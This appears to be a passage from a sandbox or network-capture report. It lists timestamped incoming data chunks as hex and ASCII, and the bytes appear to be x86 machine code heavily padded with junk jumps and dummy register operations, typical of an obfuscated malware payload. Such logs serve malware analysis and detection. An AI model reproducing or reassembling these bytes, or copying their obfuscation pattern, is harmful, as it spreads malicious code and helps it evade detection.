2022-11-26 10:17:51 UTC	496	IN	Data Raw: 98 59 b4 1e d3 52 7e c9 bc eb 05 18 d8 96 bd ba eb 05 f9 27 e0 8e f8 eb 0f 0a e2 91 c4 1e 95 10 c9 0d 9c 37 55 44 82 e2 eb 0f 33 59 54 47 bc eb 40 27 4a 9c 1e 7f f9 91 2c eb 05 71 62 1f ae 81 50 b8 65 23 00 00 b8 1f 46 00 00 50 51 b9 75 69 00 00 59 58 58 50 eb 0f 2a e7 c9 c3 06 09 46 c8 07 c3 e9 d6 1b ab 50 eb 05 e6 0d f4 63 85 50 b8 09 69 00 00 58 eb 0f a2 8c 85 3a 9f 7d 93 f4 24 a3 f9 a1 f4 23 e6 51 b9 b0 0c 00 00 b9 14 45 00 00 59 eb 19 c6 95 53 08 9a a1 6a 0b d7 b0 fb 15 e2 c9 ec 0a 1c d5 24 c4 e2 68 01 b2 9c 51 b9 37 29 00 00 b9 ee 56 00 00 59 50 b8 d0 43 00 00 58 50 eb 0f 13 1d c6 26 5c df e4 62 b9 c8 24 2f 05 80 73 b8 77 48 00 00 51 b9 af 55 00 00 b9 eb 76 00 00 52 ba 70 12 00 00 ba 07 7f 00 00 5a b9 4a 24 00 00 b9 68 7b 00 00 59 52 ba 42 64 00 00 Data Ascii: YR~'7UD3YTG@'J,qbPe#FPQuiYXXP*FPcPiX:}$#QEYSj$hQ7)VYPCXP&\b$/swHQUvRpZJ$h{YRBd
2022-11-26 10:17:51 UTC	512	IN	Data Raw: 51 b9 6b 65 00 00 59 89 c2 52 ba bc 07 00 00 ba df 2c 00 00 ba fa 6c 00 00 ba 5e 2b 00 00 5a 51 59 81 e2 00 f8 ff ff 81 fa 00 d8 00 00 0f 84 a0 05 00 00 89 c2 83 e2 fe 81 fa fe ff 00 00 eb 05 24 b1 e2 ae 0e 52 eb 05 e6 a2 a9 55 15 eb 0f d4 f1 07 01 33 f6 cf 09 1f 9a a5 45 84 dd df ba ce 39 00 00 90 51 59 52 ba 40 52 00 00 5a 5a 52 51 b9 3e 01 00 00 59 ba de 7d 00 00 ba 96 04 00 00 5a 50 b8 12 54 00 00 b8 7d 48 00 00 58 52 eb 0f 37 65 0e 22 99 fe 72 5c 9d 4b e9 22 df 3d a4 50 52 ba 1f 7e 00 00 5a b8 6e 36 00 00 b8 84 53 00 00 b8 6a 2a 00 00 b8 f3 3d 00 00 eb 05 da 3a 92 40 37 52 ba 3e 5a 00 00 5a 90 58 ba 1b 03 00 00 5a 52 eb 0f bd a6 da 10 f0 1a 13 bd 82 2e 5d b6 87 ae 70 5a ba fd ff 00 00 0f 44 c2 eb 05 16 1d d8 da 17 eb 0f 5a bf b0 37 89 db a9 de 69 59 Data Ascii: QkeYR,l^+ZQY$RU3E9QYR@RZZRQ>Y}ZPT}HXR7e"r\K"=PR~Zn6Sj*=:@7R>ZZXZR.]pZDZ7iY
2022-11-26 10:17:51 UTC	528	IN	Data Raw: 90 58 50 50 58 b8 10 5d 00 00 58 51 b9 f1 3c 00 00 b9 f5 6f 00 00 59 eb 0f bd ae 6a c7 5c 9b 24 41 90 42 7a c1 59 38 d4 90 eb 0f 61 14 0d e7 35 20 9c f1 df 7d bc 04 44 57 e4 50 b8 0f 4d 00 00 b8 f0 36 00 00 b8 a8 6a 00 00 b8 32 05 00 00 58 51 eb 0f d4 39 7f e6 44 aa 24 94 19 04 c6 5f 62 b3 d9 eb 19 df 34 b5 be a0 ec e0 83 9c f6 6b c1 47 ae 5a 7e 49 94 91 19 95 2d 25 df 72 51 90 59 52 50 58 eb 0f 3a 93 b0 e5 d8 97 b0 b8 d7 59 8e ae 99 3a 00 5a 52 ba 2e 61 00 00 ba c7 37 00 00 ba f0 0e 00 00 90 ba c2 0f 00 00 5a 52 5a eb 19 4a 10 77 86 45 0e 64 64 f6 eb 0c 1f f8 06 74 e8 91 3d 30 1f 75 0d 02 55 b3 50 58 90 50 58 50 58 eb 19 ec 30 ba c3 13 2a 04 51 7c 8d 5c 1b 51 9d f1 5e 37 8e 27 7d f0 d6 8c b3 55 50 b8 58 24 00 00 b8 23 69 00 00 58 51 b9 96 70 00 00 50 b8 Data Ascii: XPPX]XQ<oYj\$ABzY8a5 }DWPM6j2XQ9D$_b4kGZ~I-%rQYRPX:Y:ZR.a7ZRZJwEddt=0uUPXPXPX0*Q\|\Q^7'}UPX$#iXQpP
2022-11-26 10:17:51 UTC	544	IN	Data Raw: 00 00 ba 08 2d 00 00 5a 50 b8 f7 49 00 00 58 50 b8 27 0d 00 00 eb 19 50 47 e5 7e 38 4e 9d c0 64 98 a9 b3 32 11 33 77 8e 16 09 c2 c8 dd d1 ca 5a 58 90 eb 0f d7 89 59 ee 7b dd e7 bf 4c f5 c6 f5 bb 10 4b 52 ba 9a 61 00 00 5a 50 50 b8 0a 0d 00 00 58 b8 d9 19 00 00 58 51 59 eb 0f b5 b3 10 c8 16 91 b1 c9 1d de b5 64 c5 6c e6 eb 0f 09 c3 a8 55 35 51 51 59 0a be 79 ef 98 a6 46 52 ba 30 09 00 00 5a 51 50 b8 d1 0e 00 00 eb 0f ca 51 77 60 5f 28 2f 20 5a af 1c fb ad d0 4d 58 59 39 d1 0f 8c 93 02 00 00 50 b8 0b 41 00 00 b8 07 69 00 00 b8 b9 29 00 00 b8 f9 7b 00 00 eb 05 d8 dc 11 50 51 58 31 db 39 d1 bf 02 00 00 00 eb 05 99 76 e3 6b 7a eb 0f 83 b6 61 3a d1 77 88 c0 92 9a 28 3c 21 3c af eb 19 42 b2 36 2c 01 84 06 47 17 01 62 b6 e1 52 ef 8d 7d 96 61 52 dd da 6f fc e8 52 Data Ascii: -ZPIXP'PG~8Nd23wZXY{LKRaZPPXXQYdlU5QQYyFR0ZQPQw`_(/ ZMXY9PAi){PQX19vkza:w(<!<B6,GbR}aRoR
2022-11-26 10:17:51 UTC	560	IN	Data Raw: 2e ae 4e a9 2f 5e 67 6e d8 dc f6 eb 19 e3 2b 90 e2 48 b4 57 9b b1 9b 3e 26 40 0a cd 92 68 55 02 34 9f 50 87 67 ae 52 5a eb 05 88 6d c4 1c 0a ba 7c 3c 00 00 5a eb 05 50 37 59 dc a6 eb 19 99 b2 e7 6a cb 3b e9 97 d7 0d 15 15 78 da 33 43 f3 c5 79 a3 34 e4 9c 4b 64 eb 0f ec bd 19 fa 0d 62 30 1a dc 22 83 6d d2 ef a0 eb 05 5c c8 3f 53 cf b9 c7 63 00 00 b9 8e 3a 00 00 59 50 90 b8 cf 7f 00 00 b8 95 0b 00 00 b8 c9 65 00 00 b8 76 6d 00 00 eb 0f ad 06 fd 20 7b 52 65 7a 60 69 f2 e2 8f fa f6 58 31 f6 53 52 ba 79 40 00 00 5a 51 b9 db 27 00 00 59 83 ec 0c eb 0f 5d e9 fc d9 f8 bd 20 48 f1 3b c8 97 c3 49 ed 89 45 ec 51 90 eb 0f 9f f2 fd 9e 1a 57 ed 48 e2 89 9f 29 6d ee 10 eb 0f 47 c7 d2 51 32 20 ae 08 98 6b 9f 43 64 69 be 50 b8 6d 10 00 00 b8 21 7e 00 00 58 51 59 50 b8 37 Data Ascii: .N/^gn+HW>&@hU4PgRZm\|<ZP7Yj;x3Cy4Kdb0"m\?Sc:YPevm {Rez`iX1SRy@ZQ'Y] H;IEQWH)mGQ2 kCdiPm!~XQYP7
2022-11-26 10:17:52 UTC	576	IN	Data Raw: 00 00 0f b6 53 03 c1 e7 0e 50 b8 6d 02 00 00 52 ba da 2d 00 00 5a 51 b9 b2 55 00 00 b9 0b 60 00 00 51 59 59 eb 0f d4 a9 d0 5d 6e d6 c3 b3 f1 69 b6 35 c9 61 8f 52 ba 42 2f 00 00 5a 58 50 b8 f0 18 00 00 eb 05 76 a1 d8 11 9c eb 0f d4 c1 82 cc 1a d3 98 15 4e be 7d 74 01 c4 43 b8 cb 48 00 00 b8 c2 47 00 00 52 5a 90 90 b8 ad 1e 00 00 58 eb 05 f7 8f 4c a0 68 09 fa 51 eb 19 5e 7e 06 fe 32 ad d6 a5 7e e1 2d c0 19 61 1f d9 76 01 c4 5e 62 b9 9a 13 25 b9 7b 76 00 00 59 89 d0 eb 0f e6 be 79 ad 8b b4 a4 36 27 2b ee 2e 50 86 56 50 58 51 b9 28 6c 00 00 59 90 eb 0f f6 a0 d2 6f c5 63 85 76 4e 1a 9b 7c ae 02 25 25 7f c0 1f 00 80 e2 80 52 ba fc 48 00 00 ba d2 2e 00 00 5a 90 eb 0f 5b e3 ec 2e 76 97 38 bd f6 03 b9 20 6e 0c 2b 0f 85 16 02 00 00 c1 e1 07 50 b8 2a 02 00 00 b8 ea Data Ascii: SPmR-ZQU`QYY]ni5aRB/ZXPvN}tCHGRZXLhQ^~2~-av^b%{vYy6'+.PVPXQ(lYocvN\|%%RH.Z[.v8 n+P*
2022-11-26 10:17:52 UTC	592	IN	Data Raw: 8c b1 c1 5f da c7 3c 57 2c 14 3f f4 17 09 50 b8 42 3c 00 00 58 59 eb 0f 2d 7a 89 ce be 5b 58 28 0d 68 31 ca 69 ad 0c 0f 87 40 05 00 00 6b c7 0a eb 0f 31 bd 1e e2 15 30 65 3b 1e b1 69 ec 5e ad c0 50 b8 b1 7d 00 00 b8 cc 78 00 00 58 eb 0f 35 52 fc dd e2 4a c8 d8 ad c6 c3 f3 af c0 16 eb 19 e9 14 40 b4 76 3f d0 c6 7e 7f df 2a f4 13 40 a3 ed 3b 2e c9 16 af ac 28 7c eb 05 c1 ad bf b3 2a 51 b9 b2 40 00 00 59 eb 05 09 96 69 29 c8 50 b8 8c 4e 00 00 58 51 b9 50 0c 00 00 b9 cf 2e 00 00 59 eb 19 83 04 0e 32 c2 b8 42 f3 fb 39 a1 24 2e 73 13 44 23 b4 04 a1 c1 af ce 05 cb 50 b8 1b 08 00 00 b8 3a 45 00 00 b8 eb 5a 00 00 b8 ac 6b 00 00 58 50 58 52 5a 52 5a 51 59 eb 0f c3 c0 fd 24 1f 9b 61 6c 0a 3d 6f b0 b4 50 79 eb 05 b7 53 80 0f 96 51 51 b9 8f 77 00 00 b9 a5 4a 00 00 59 Data Ascii: _<W,?PB<XY-z[X(h1i@k10e;i^P}xX5RJ@v?~@;.(\|Q@Yi)PNXQP.Y2B9$.sD#P:EZkXPXRZRZQY$al=oPySQQwJY
2022-11-26 10:17:52 UTC	608	IN	Data Raw: b8 9e 5b 00 00 b8 1f 6c 00 00 b8 12 67 00 00 58 50 b8 33 75 00 00 58 58 89 48 04 e9 a3 00 00 00 90 52 eb 0f 6a 36 2c 78 bf e0 c0 12 40 60 b6 dd 6e 42 9d ba 67 25 00 00 50 58 ba 99 47 00 00 51 52 ba 07 74 00 00 5a 59 eb 0f d4 99 9a 70 cb 36 9f 2f 75 c3 fa cd 97 a4 fe eb 19 a7 28 2d 09 37 6f b8 b5 e6 63 fd 34 f5 30 e1 d7 7a 37 ae 5c ae 65 6f 47 ec 52 ba 63 69 00 00 ba a3 4f 00 00 ba a7 7a 00 00 ba e0 08 00 00 5a 90 5a 8b 43 08 89 01 85 c0 74 04 90 89 48 04 c7 41 04 00 00 00 00 90 50 b8 d0 60 00 00 b8 95 4c 00 00 b8 76 2a 00 00 50 58 b8 f1 7a 00 00 eb 05 17 22 79 76 dd 58 89 4b 08 5b 50 b8 c1 2b 00 00 eb 19 22 86 6d bf 42 c7 a6 cf 8f 7f 3c 7c 12 18 bf 94 be fc be 8b 2d 02 e7 63 65 b8 df 7a 00 00 58 5e 52 ba 1f 42 00 00 eb 0f 41 9c ed 3b a3 95 f2 a7 00 d8 d0 Data Ascii: [lgXP3uXXHRj6,x@`nBg%PXGQRtZYp6/u(-7oc40z7\eoGRciOzZZCtHAP`Lv*PXz"yvXK[P+"mB<\|-cezX^RBA;
2022-11-26 10:17:52 UTC	624	IN	Data Raw: 0c 6c 52 51 b9 a3 55 00 00 51 eb 0f 82 d6 5a 62 83 78 72 1c 56 19 a8 41 d7 9d db 50 90 b8 d8 66 00 00 58 eb 05 15 0a 2a 2d 05 50 b8 a7 1f 00 00 58 51 51 b9 6a 2d 00 00 59 b9 03 41 00 00 59 eb 05 93 1d 21 8d ae 52 5a 59 50 b8 ab 49 00 00 58 eb 05 d2 a7 08 af d5 eb 0f 3b d3 f3 db 99 d3 83 3c bf cf 8d 19 1f 85 5b 52 5a eb 19 b6 8c 57 fa b9 5f 2d 23 42 c9 0e 24 5b 9e 20 b0 5a bd 7c 97 b1 3f 9c 93 1c 51 b9 e4 14 00 00 b9 0c 36 00 00 b9 82 38 00 00 b9 4e 59 00 00 eb 05 03 90 cd 89 78 59 eb 19 3d 30 f3 c6 6c 5e 84 6d 7a f8 88 49 6e 2e e5 90 39 06 43 98 0f c9 6d a2 db 59 eb 0f da 90 b2 69 70 f5 9c a2 27 03 b3 c4 e8 43 a1 eb 19 57 9e a9 60 6a 5d 87 17 b5 82 ef 51 cd ba 76 11 0a a8 40 b5 20 63 18 32 53 5a 55 89 e5 8b 45 08 8b 40 14 89 45 08 5d 8b 40 34 51 b9 34 1c Data Ascii: lRQUQZbxrVAPfX*-PXQQj-YAY!RZYPIX;<[RZW_-#B$[ Z\|?Q68NYxY=0l^mzIn.9CmYip'CW`j]Qv@ c2SZUE@E]@4Q4
2022-11-26 10:17:52 UTC	640	IN	Data Raw: 75 00 00 ba b6 13 00 00 5a 58 8b 43 1c 52 ba 8c 3f 00 00 51 b9 6d 67 00 00 59 5a eb 05 da 21 dc 6b b0 89 73 18 50 b8 ce 70 00 00 58 51 b9 8f 25 00 00 59 83 e0 0a 51 b9 70 62 00 00 59 50 b8 67 06 00 00 58 eb 0f e4 03 52 ad 26 5c d5 90 83 c9 21 9c 05 4c 3d 66 83 f8 0a eb 19 77 ea fb 0a 82 33 4f 6d 70 1e be 3d d0 73 fb 85 46 ac 6e ac c3 db b1 45 39 52 ba 80 6a 00 00 ba 10 2d 00 00 ba 67 00 00 00 ba dc 7e 00 00 eb 0f 35 ca cb 99 de 1d 7e 8d 44 fd cb 0b fb cc a7 5a eb 0f ce 8c ac 19 bf 09 fb 32 fc 0d d6 86 a6 34 74 eb 05 b6 89 2a 87 21 eb 0f 3f fc a5 58 16 f1 43 92 d7 e8 8c f1 fb fb a2 eb 0f db db 9e d7 11 1a 13 17 42 88 1d fd 97 b5 f1 51 b9 b9 60 00 00 b9 41 10 00 00 59 0f 85 30 02 00 00 83 c4 1c 50 b8 16 0d 00 00 58 89 d8 eb 0f 6e 06 98 26 89 de e6 05 e8 99 Data Ascii: uZXCR?QmgYZ!ksPpXQ%YQpbYPgXR&\!L=fw3Omp=sFnE9Rj-g~5~DZ24t*!?XCBQ`AY0PXn&
2022-11-26 10:17:52 UTC	656	IN	Data Raw: 03 59 06 87 4c ac 77 2d 42 62 42 43 77 55 c8 f9 bf 56 69 b0 cc e2 eb 05 42 cd 2a 1a d5 eb 19 2f 1a 8a cf e4 a8 6f 45 f4 50 f7 1b a9 5a 9c 7a b7 d7 71 9c 75 91 a5 94 1b 50 58 ff 90 dc 00 00 00 83 c4 14 50 b8 04 6c 00 00 b8 17 45 00 00 58 50 50 b8 b4 64 00 00 58 50 eb 0f b6 e3 23 e8 e6 c0 36 fe af 39 16 4c ec 16 00 b8 84 4c 00 00 51 b9 fe 5e 00 00 59 51 b9 72 2d 00 00 b9 bc 7f 00 00 59 58 b8 1c 20 00 00 b8 79 0f 00 00 b8 9a 6a 00 00 51 b9 f3 7e 00 00 59 b8 aa 4b 00 00 50 58 58 5b 52 ba 63 51 00 00 5a 51 eb 0f e6 68 7b d2 16 3a b2 7b a6 e3 15 4a 37 64 b5 eb 0f 45 4f 31 de 7c 51 d5 86 39 8b 97 f1 ca dd 11 b9 cb 24 00 00 b9 a0 00 00 00 51 b9 80 38 00 00 50 b8 d9 66 00 00 b8 d4 26 00 00 b8 43 5b 00 00 b8 ff 68 00 00 58 b9 d7 57 00 00 b9 39 00 00 00 b9 18 18 00 Data Ascii: YLw-BbBCwUViB*/oEPZzquPXPlEXPPdXP#69LLQ^YQr-YX yjQ~YKPXX[RcQZQh{:{J7dEO1\|Q9$Q8Pf&C[hXW9
2022-11-26 10:17:52 UTC	672	IN	Data Raw: 50 1a 00 00 ba 2a 2a 00 00 5a eb 19 8c 5c b4 8c 6a 9c f7 26 65 53 5f 8d 26 51 fe 89 1a 4b 73 19 0b 2e df b9 b2 eb 0f 6e 96 ce 81 2f 26 66 26 92 ad 6a 5e 2a 5c 67 51 b9 c0 2a 00 00 eb 19 dc c4 3a 70 45 01 11 37 98 70 ea b5 42 98 1b 18 a7 88 6d 46 34 31 b9 de 6c b9 52 55 00 00 52 5a b9 36 68 00 00 b9 17 44 00 00 59 eb 0f 27 d9 a6 5b 11 b7 63 b5 bd 2e 2f ee c0 5a fb 52 ba e8 78 00 00 ba 7d 01 00 00 5a c1 e6 07 8a 50 03 eb 0f b2 4a 0c 39 52 6e 11 0d 72 da d3 4d d5 b0 fb 51 b9 d4 64 00 00 b9 cd 57 00 00 52 ba 32 2f 00 00 ba 89 72 00 00 5a 50 b8 0f 38 00 00 58 b9 be 20 00 00 b9 51 1b 00 00 59 eb 0f 60 fd fe 26 02 76 34 52 62 0c 48 8f 9c c2 49 eb 19 d3 70 8c e0 3d 8e 76 03 63 1d 70 7e 35 27 db eb 29 f7 29 5a d3 6a 19 e7 24 eb 19 0d 07 62 a6 cf ae a8 3e df fe 68 Data Ascii: P*Z\j&eS_&QKs.n/&f&j^\gQ*:pE7pBmF41lRURZ6hDY'[c./ZRx}ZPJ9RnrMQdWR2/rZP8X QY`&v4RbHIp=vcp~5'))Zj$b>h
2022-11-26 10:17:52 UTC	688	IN	Data Raw: 00 b9 7c 71 00 00 59 50 b8 18 00 00 00 b8 4b 4c 00 00 51 b9 6e 58 00 00 50 b8 88 48 00 00 b8 b7 5f 00 00 58 b9 b3 6a 00 00 52 5a 51 eb 0f d6 33 7f f4 e1 5e 4e b6 ae db 54 d7 c2 4b 90 b9 38 0a 00 00 51 b9 6c 13 00 00 b9 93 57 00 00 59 51 59 b9 df 45 00 00 59 b9 82 31 00 00 eb 19 7b 3a 94 64 f8 b5 c9 bf 62 d3 2c 2c c2 ef db b9 6d 98 7a c9 b5 74 77 e3 f0 52 ba fd 3e 00 00 ba ae 63 00 00 ba 97 28 00 00 ba 00 19 00 00 5a 51 b9 38 37 00 00 59 eb 05 5f 26 1d 14 f8 51 b9 fb 07 00 00 59 b9 4d 6a 00 00 59 90 58 eb 05 e5 71 7d 2f be 90 ff 50 4c 52 ba 0d 73 00 00 ba 72 7e 00 00 5a 66 89 06 8b 43 0c 52 ba ee 4e 00 00 5a eb 19 d0 b6 64 4c 12 ee ce a1 8f c9 d2 69 22 5b 13 4c 28 9a 5d f1 84 e9 96 f9 12 eb 0f e6 02 20 c6 20 91 a5 b9 28 c4 cc bb 21 95 f2 66 8b 04 38 eb 19 Data Ascii: \|qYPKLQnXPH_XjRZQ3^NTK8QlWYQYEY1{:db,,mztwR>c(ZQ87Y_&QYMjYXq}/PLRsr~ZfCRNZdLi"[L(] (!f8
2022-11-26 10:17:52 UTC	704	IN	Data Raw: 8b 45 08 eb 0f 9b 83 af dd d5 f8 cb 84 7a 2f 4e fc c0 fb 5a 85 c0 eb 0f 23 e6 b6 39 80 b8 00 76 0a 9d 7f 6a 67 be a1 74 02 8b 00 90 eb 19 99 ea 55 06 87 f8 10 94 23 ed 1b 98 85 42 02 90 0e f6 28 06 90 42 b0 43 1f eb 0f e4 44 2e 66 ef 95 d0 b6 eb b1 30 37 fa f6 f5 eb 19 3a aa 26 03 06 67 6d e8 4a 58 43 0d be dd 47 69 d2 2a 02 30 f7 4e 5c c4 4d eb 0f 80 a5 37 4d 82 c6 6c 85 dc e9 6e ad f9 06 25 eb 0f e2 aa e1 86 df ea bc d6 79 db 4c 2c 84 6e 8d eb 0f 59 50 84 71 8e de 26 18 74 bf 69 fd a9 a5 ad eb 0f 3d 22 47 f0 51 08 87 43 52 2e db 08 2a 66 2c eb 19 27 99 d3 88 26 5c a2 b6 a8 5d 62 c2 a2 98 24 fe 80 08 84 4a d3 14 b9 a0 f8 eb 0f 6a 41 81 9b fd c6 96 ba 60 3e 58 40 34 57 e1 51 b9 7c 7d 00 00 59 52 ba 3d 69 00 00 eb 0f 43 3c 29 46 eb 78 0c 0a fd 17 71 3b d1 Data Ascii: Ez/NZ#9vjgtU#B(BCD.f07:&gmJXCGi0N\M7Mln%yL,nYPq&ti="GQCR.f,'&\]b$JjA`>X@4WQ\|}YR=iC<)Fxq;
2022-11-26 10:17:52 UTC	720	IN	Data Raw: e6 31 67 41 6f 9f 9b 0f eb 0f ad 01 f9 88 ad 12 4e 28 47 73 81 03 1b a1 26 50 eb 0f ad 1e c1 53 59 21 00 e5 e6 ae e0 40 fe 2c 4f 52 5a eb 0f 97 64 dd 30 b4 f1 ee 9e 58 1d e8 22 56 7e 5e 51 b9 7c 0a 00 00 59 58 eb 0f 5f 78 06 0d 12 27 3f b6 49 89 50 3e 02 ce 4b eb 19 ad 64 ce d7 f2 d9 f5 2d 94 f3 0b e0 95 f4 60 89 16 07 82 30 8c 18 48 e5 90 eb 0f f1 22 cb 0a 64 37 cd 10 7e 2f 0b d3 80 76 11 31 c0 52 ba 01 12 00 00 eb 0f 1a 68 b5 05 ec 76 85 cb 1b 58 24 c3 03 44 9f eb 19 1d d0 a1 6b 7b db ee 5f 9c 6a b3 29 72 bf 43 66 de 47 85 16 7e c1 2b d4 78 50 b8 4e 6d 00 00 b8 c4 4a 00 00 50 eb 05 f7 48 dd e5 45 b8 91 5e 00 00 b8 7a 29 00 00 b8 28 66 00 00 90 b8 32 2e 00 00 58 eb 05 95 ed ee 10 05 52 ba 40 71 00 00 ba 3e 7d 00 00 ba 32 2a 00 00 ba 38 30 00 00 5a b8 88 Data Ascii: 1gAoN(Gs&PSY!@,ORZd0X"V~^Q\|YX_x'?IP>Kd-`0H"d7~/v1RhvX$Dk{_j)rCfG~+xPNmJPHE^z)(f2.XR@q>}2*80Z
2022-11-26 10:17:52 UTC	736	IN	Data Raw: 16 68 00 00 b8 d7 00 00 00 eb 0f 3c 42 29 a3 42 76 63 86 db 75 6b 52 36 75 86 58 0f 84 5e 01 00 00 50 58 8b 43 10 39 47 10 0f 85 e5 00 00 00 8b 43 0c eb 0f f0 f2 ea 3c c3 63 55 9b f9 08 08 f0 73 dc d4 90 eb 19 6e c1 4b ee 50 27 cd a9 c4 5b b3 3d c5 f1 b5 79 96 6d 94 a8 4e df e4 cc f5 90 89 44 24 04 8b 47 0c 89 04 24 e8 b3 e4 fc ff eb 0f 85 9f 81 d0 e3 32 6b 1d b7 0e d5 5b ae 9b 92 eb 0f bb a8 b7 76 fc c0 44 71 9c 97 75 d9 35 17 20 eb 19 b7 a8 e0 aa 5f b5 54 0c 54 22 2e 26 c0 d6 14 e3 62 c2 04 c9 fa 99 c7 a5 ef 50 b8 74 02 00 00 b8 ba 3f 00 00 b8 50 1f 00 00 b8 3d 0d 00 00 58 eb 0f b4 6d f2 ac 95 3d 3b 80 0d d2 d5 48 7e 47 5b 50 eb 0f a8 1c c8 60 e2 43 67 3a 17 08 66 6b 8b e3 94 52 ba 7e 26 00 00 50 58 5a 50 b8 4e 62 00 00 b8 31 4e 00 00 58 58 85 c0 eb 0f Data Ascii: h<B)BvcukR6uX^PXC9GC<cUsnKP'[=ymND$G$2k[vDqu5 _TT".&bPt?P=Xm=;H~G[P`Cg:fkR~&PXZPNb1NXX
2022-11-26 10:17:52 UTC	752	IN	Data Raw: d1 bd fb ff 83 c4 1c 89 f8 5b 5e eb 05 ef 27 94 d9 60 5f 5d eb 19 74 08 a2 57 a0 2f ce 16 31 65 29 c9 bb c0 6e 8c 87 ae 35 47 ba 85 16 e8 2d 52 ba 62 01 00 00 ba 5c 34 00 00 5a 52 ba e8 4b 00 00 ba db 6b 00 00 ba cf 33 00 00 ba 2e 32 00 00 5a c3 eb 05 9a 87 9f 59 57 51 90 b9 f0 12 00 00 b9 6b 46 00 00 eb 0f 80 82 88 1a 9e 64 68 2b 6e 2f 46 4a ce 24 49 59 55 89 e5 52 ba a5 6c 00 00 ba 86 62 00 00 ba 93 38 00 00 ba ef 22 00 00 5a 52 5a 53 83 ec 24 8b 5d 08 8b 43 0c 51 b9 5f 41 00 00 59 89 04 24 e8 96 b0 fb ff 8b 55 0c 8b 83 e8 00 00 00 89 93 ec 00 00 00 8b 55 10 89 45 f4 89 93 e8 00 00 00 8b 53 0c 89 14 24 e8 04 bd fb ff 8b 45 f4 83 c4 24 5b eb 0f b0 80 d3 ed eb d8 ba b8 d7 ce 3a 76 f1 a0 0c eb 05 91 27 48 bc 79 52 ba 10 0e 00 00 ba 92 1a 00 00 5a 52 ba c7 Data Ascii: [^'`_]tW/1e)n5G-Rb\4ZRKk3.2ZYWQkFdh+n/FJ$IYURlb8"ZRZS$]CQ_AY$UUES$E$[:v'HyRZR
2022-11-26 10:17:52 UTC	768	IN	Data Raw: 36 2d 00 00 59 0f b7 75 f2 8b 4d 10 47 eb 0f 09 97 5d 85 70 9d c7 42 f6 99 c3 fd b0 5f 15 52 ba 9c 63 00 00 5a eb 0f 1a 73 f9 69 4e cc cf 43 85 cc df 4e e8 e1 28 8b 34 b3 89 75 dc 66 8b 75 f2 51 b9 28 28 00 00 59 66 89 74 79 fe 3b 45 e8 0f 8d fa fd ff ff 8b 4d ec 8b 75 dc 0f b7 0c 41 39 34 8b 0f 85 e7 fd ff ff 90 51 b9 b0 31 00 00 59 40 50 58 eb 05 aa 19 0d c4 9b 50 b8 bf 31 00 00 58 e9 c9 fd ff ff 3b 45 e8 0f 8c d2 fd ff ff 8b 5d ec 50 b8 66 05 00 00 b8 81 24 00 00 58 8b 45 08 8d 0c 3f 52 eb 0f 9a 00 a2 0a 23 bf 95 b2 e6 91 9b 2d 51 ea 5c ba 6f 45 00 00 ba f9 5f 00 00 5a 8b 75 10 89 18 52 ba 02 5a 00 00 5a 8b 45 0c 89 38 89 df f3 a4 83 c4 18 5b 5e 5f 5d c3 eb 19 46 26 03 67 b1 a9 fd f2 21 6e 41 3f d9 7b 99 d2 5d 12 46 d5 04 32 a8 39 f3 51 b9 57 22 00 00 Data Ascii: 6-YuMG]pB_RcZsiNCN(4ufuQ((Yfty;EMuA94Q1Y@PXP1X;E]Pf$XE?R#-Q\oE_ZuRZZE8[^_]F&g!nA?{]F29QW"
2022-11-26 10:17:52 UTC	784	IN	Data Raw: 87 c8 48 19 b8 0c c0 f5 73 3f d3 00 18 41 36 eb 19 b5 d3 c5 08 51 5e a5 6b 26 2f e4 ee c2 c6 81 95 9c 10 c0 ce c7 2c 7b 58 10 eb 19 43 31 ca e2 7e 3d b3 e4 26 e7 a1 fb a5 88 1d 46 ad a6 d6 63 28 72 20 33 b0 90 eb 0f 17 a1 33 63 7c 20 ba d2 06 ee 33 66 30 b3 ca eb 0f 43 01 c9 7f 73 e9 7d e1 92 72 4c 36 03 90 f4 eb 05 92 76 f7 a1 0a eb 0f db c8 75 c9 a1 e2 72 15 8a 89 23 2a 0d b9 b8 eb 0f d8 e4 9f a3 27 7b 56 cd 14 e1 10 d7 95 f3 97 8d 45 d4 52 ba 8f 26 00 00 5a e8 3f a2 fb ff 89 c3 31 c9 eb 0f 9c 0a 57 0d 05 de 48 be a8 95 5e 8b 0b d2 ed 51 59 eb 19 39 0d 74 39 2a 3f 45 f4 c6 f8 a2 cd 4e 43 8f b0 1f 4a b5 68 31 f1 5a df b2 90 90 eb 0f c1 25 d1 07 ee 11 3e 3c a9 ba 52 c1 98 65 10 85 db 0f 84 16 fe ff ff 52 ba 04 0c 00 00 5a 83 fb 5d 0f 84 8f 01 00 00 83 fb Data Ascii: Hs?A6Q^k&/,{XC1~=&Fc(r 33c\| 3f0Cs}rL6vur#'{VER&Z?1WH^QY9t9?ENCJh1Z%><ReRZ]
2022-11-26 10:17:52 UTC	800	IN	Data Raw: 06 00 00 b9 9e 68 00 00 59 55 50 b8 f6 5d 00 00 b8 c7 72 00 00 b8 68 05 00 00 b8 96 76 00 00 58 89 e5 52 ba f4 0b 00 00 5a 57 56 89 c6 51 90 b9 a5 5a 00 00 59 50 b8 1b 67 00 00 58 50 b8 2a 3f 00 00 b8 b3 5a 00 00 51 eb 0f 01 2b fe 26 e5 11 55 69 3e 5a fe f3 9b b9 2a 50 b8 b9 3c 00 00 b8 49 7a 00 00 58 51 59 59 b8 92 67 00 00 b8 7c 18 00 00 eb 0f db b8 8b 96 85 65 b2 cc 31 4f 9b af db 1b fe 58 53 eb 0f 81 cd 25 48 b1 9e 6b 95 cb 71 57 65 89 e9 17 89 d3 83 ec 2c 85 c9 0f 84 4f 02 00 00 8b 40 14 31 ff 89 45 e4 90 39 7d e4 0f 8e bb 00 00 00 89 f8 89 4d e0 c1 e0 04 eb 19 36 74 27 31 84 5e 0c 5d c8 b2 cb 61 19 b8 20 08 14 14 7e 4a 06 f8 6e 56 54 eb 0f 0f 3e ec 7e 1d a0 22 33 fc c8 b9 60 9c 39 b2 52 ba 0a 11 00 00 50 b8 37 7a 00 00 90 b8 f4 12 00 00 58 5a eb 19 Data Ascii: hYUP]rhvXRZWVQZYPgXP?ZQ+&Ui>ZP<IzXQYYg\|e1OXS%HkqWe,O@1E9}M6t'1^]a ~JnVT>~"3`9RP7zXZ
